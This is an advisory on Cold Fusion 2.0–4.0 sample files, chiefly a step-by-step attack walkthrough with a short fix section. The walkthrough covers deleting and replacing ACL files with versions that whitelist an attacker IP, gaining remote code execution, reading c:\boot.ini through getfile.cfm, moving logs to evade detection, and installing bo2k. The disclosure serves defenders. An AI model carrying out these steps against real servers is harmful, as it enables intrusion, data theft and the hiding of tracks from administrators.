COMMAND

    Cold Fusion

SYSTEMS AFFECTED

    Cold Fusion 2.0 - 4.0

PROBLEM

    rot26  networks  (nny)  found  following.   The  Cold  Fusion ACLs
    referenced from other scripts are  like any other file and  may be
    deleted  via  the  RequestTimeout  deletion  attack  described  by
    Mr. Klinsky in  the recent l0pht  advisory.  Some  ACL "protected"
    files include those which may  view contents of files, upload  new
    files  to  the  system,  and  a  raw  code  interpreter for remote
    execution  of  CF  code  which  may  contain  tags  for   registry
    modification.

    Using  the  expression  evaluator  an  attacker  could back up the
    system  logs  for  later  comparison  (upon attack) and modify via
    uploading to the server and moving the files.  The attacker  could
    then proceed  to back  up the  expression evaluator  (exprcalc.cfm
    specifically), also  for later  modification.   For other  attacks
    which  will  not  be  focused  on,  an  attacker  could  also call
    sendmail.cfm without any arguements  to return a system  date time
    stamp as well as directory structures.

    For the attack, have the expression evaluator delete (as explained
    in the l0pht advisory)  the ACL cfdocs/expeval/check_ip.cfm.   Now
    delete   the   expression   evaluator   (exprcalc.cfm)   and   use
    openfile.cfm  to  upload  a  modded   ACL  along  with  a   modded
    exprcalc.cfm.   The modded  exprcalc.cfm is  pretty basic,  simply
    remove  all  lines  past  the  </HTML>.   The final CFIF statement
    merely checks  if the  file is  open and  deletes it.   Again  use
    openfile.cfm  to  upload  a  renamed  original  exprcalc.cfm; this
    provides us with a convenient was to do a view/delete combo.   For
    sake of  future examples  the name  exprcal.cfm will  be used.  An
    attacker now has the ability  to, among other things, execute  raw
    code on  the server,  upload files  at will,  and delete  files at
    will.   Previously  the  eval.cfm  file  was  restricted  via  the
    check_ip.cfm ACL.  The modded check_ip.cfm contains the  attackers
    IP as well as the default ACL restriction of 127.0.0.1.

    There are more ACLs to be attacked though.  Have the original  now
    renamed expression evaluator delete the second and third ACLs

        /cfdocs/exampleapp/publish/admin/application.cfm
        /cfdocs/exampleapp/email/application.cfm

    Again use openfile.cfm to upload  modded ACLs and some scripts  to
    move   them   to   their   proper   dirs.    The   ACL   for   the
    /cfdocs/exampleapp/email dir pretty much just needs to exist maybe
    containing a few spaces.  Run  the move scripts and now the  admin
    and email dirs are owned.  Either use the expression evaluator  to
    delete the move scripts or  mod the sample move scripts  included.
    An attacker  now has  full access  to the  Administrator directory
    which contains a  nice packaged system  file upload utility  so we
    don't have to go through the openfile dual exprcalc hassle.   Plus
    we now have a convenient file read utility.  For example:

        http://www.server.com/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini

    To facilitate Anonymous web browsing or to defeat localhost  trust
    one may  wish to  upload httpclient.cfm  which was  found in  Cold
    Fusion  Application  Server  3.x  and  mentioned in rfp's original
    advisory.  Now the new logs may be retrieved, diff'd with the  old
    ones, and modded to your delight.  Note: For further owning,  bo2k
    could easily be uploaded and installed.

    An  attacker  has  the  ability  to  execute  raw code, modify the
    registry,  view  system  files,  act  as  a  trusted  host to such
    services  as  IIS,  upload  files,  delete  files,  circumvent log
    files, circumentvent ACLs, and view web pages anonymously.  Sample
    Code:

    check_ip.cfm modded code:

    < <CFIF #CGI.REMOTE_ADDR# IS NOT "127.0.0.1">

    > <CFIF #CGI.REMOTE_ADDR# IS NOT "127.0.0.1" AND #CGI.REMOTE_ADDR# IS NOT
    "$attackers_ip">

    application.cfm modded code:

    < <CFIF CGI.REMOTE_ADDR IS NOT "127.0.0.1">

    > <CFIF CGI.REMOTE_ADDR IS NOT "127.0.0.1" AND CGI.REMOTE_ADDR IS NOT
    "$attackers_ip">

    logfile-mover.cfm code:

    <CFFILE ACTION="Move"
       SOURCE="c:\inetpub\wwwroot\cfdocs\expeval\application.log"
       DESTINATION="c:\cfusion\log\">
    <CFFILE ACTION="Move"
       SOURCE="c:\inetpub\wwwroot\cfdocs\expeval\webserver.log"
       DESTINATION="c:\cfusion\log\">
    <CFFILE ACTION="Move"
       SOURCE="c:\inetpub\wwwroot\cfdocs\expeval\server.log"
       DESTINATION="c:\cfusion\log\">

    The other  move scripts  may easily  be derived  from this one and
    having the scripts delete themselves would also be trivial.

SOLUTION

    Restrict access to or preferably delete Cold Fusion sample  files.
    These include but are certainly not limited to:

        /cfdocs/expeval/exprcalc.cfm
        /cfdocs/expeval/sendmail.cfm
        /cfdocs/expeval/eval.cfm
        /cfdocs/expeval/openfile.cfm
        /cfdocs/expeval/displayopenedfile.cfm
        /cfdocs/exampleapp/email/getfile.cfm
        /cfdocs/exampleapp/publish/admin/addcontent.cfm

    Note:  Heed  all  warnings  or  none  at all, if you merely delete
    exprcalc.cfm  it  may  simply  be  reuploaded  via  openfile.cfm /
    displayopenedfile.cfm.  Due to the nature of the previous  attacks
    by rfp  and klinsky,  if your  /cfdocs/expeval/exprcalc.cfm is not
    found you MAY have already been attacked.  Follow the fix  warning
    above and also make sure your ACLs have not been tampered with.